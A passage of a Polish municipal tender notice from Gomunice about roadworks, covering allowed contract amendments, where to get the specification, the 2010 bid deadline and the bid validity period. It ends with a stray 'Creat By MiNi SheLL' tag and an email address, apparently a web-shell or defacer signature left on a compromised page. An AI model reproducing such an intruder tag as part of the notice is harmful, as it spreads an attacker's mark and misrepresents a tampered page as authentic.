<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 Wystąpienia konieczności zmiany terminu realizacji robót ze względu na:
     nieterminowe przekazanie przez Zamawiającego frontu robót ( placu budowy );
     zmiany w harmonogramie rzeczowo-terminowo-finansowym stanowiącym załącznik do 
       umowy;
     konieczności wykonania robót dodatkowych;
     zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi,
     konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji;
     wstrzymania przez Zamawiającego wykonania robót;
     klęską żywiołową;	
     siłę wyższą.
2. Wykonawca będzie miał prawo do zmiany wynagrodzenia w przypadku wystąpienia 
       robót dodatkowych, pod warunkiem, że konieczność wprowadzenia takich zmian wynika 
       z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a 
       zrealizowanie założonego pierwotnie celu umowy byłoby bez tych zmian niemożliwe lub 
       zmiany te są korzystne dla Zamawiającego.
       Podstawą sporządzenia kosztorysu na roboty wynikające ze zmiany stanowi: 
     dokumentacja projektowa i specyfikacje techniczne, 
     kosztorys ofertowy w części cen jednostkowych lub dane wyjściowe do 
       kosztorysowania, przyjęte do sporządzenia kosztorysu ofertowego,
     ceny jednostkowe pracy sprzętu i materiałów zaproponowane przez wykonawcę, ale nie 
       większe niż średnie ceny SEKOCENBUD dla kwartału poprzedzającego termin 
       wykonania robót. 
   3. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w 
       stosunku do treści oferty w sytuacji:  
    zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż 
       zakładano w opisie przedmiotu zamówienia; 
    zmiany osób reprezentujących w przypadku zmian organizacyjnych;
     zmiany osób realizujących zadanie pod warunkiem, że osoby te będą spełniały 
       wymagania określone w SIWZ; 
     w przypadku wystąpienia niekorzystnych warunków atmosferycznych, lub innych 
       nieprzewidzianych przeszkód uniemożliwiających prowadzenie robót zgodnie z 
       wymaganiami technicznymi określonymi w SIWZ oraz STWiORB;
  4. Zamawiający przewiduje możliwość dokonania innych zmian umowy, pod warunkiem, że 
      konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było 
      przewidzieć w chwili zawarcia umowy, a zrealizowanie założonego pierwotnie celu 
      umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla       
      Zamawiającego. 
  5. Każda zmiana musi być uzgodniona i wprowadzona aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gomunice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD  GMINY GOMUNICE 
97 - 545  GOMUNICE
ul. Armii Krajowej 30 pok.nr.3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2010 godzina 09:00, miejsce: URZĄD  GMINY  GOMUNICE
97- 545  GOMUNICE 
ul. Armii Krajowej 30 
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com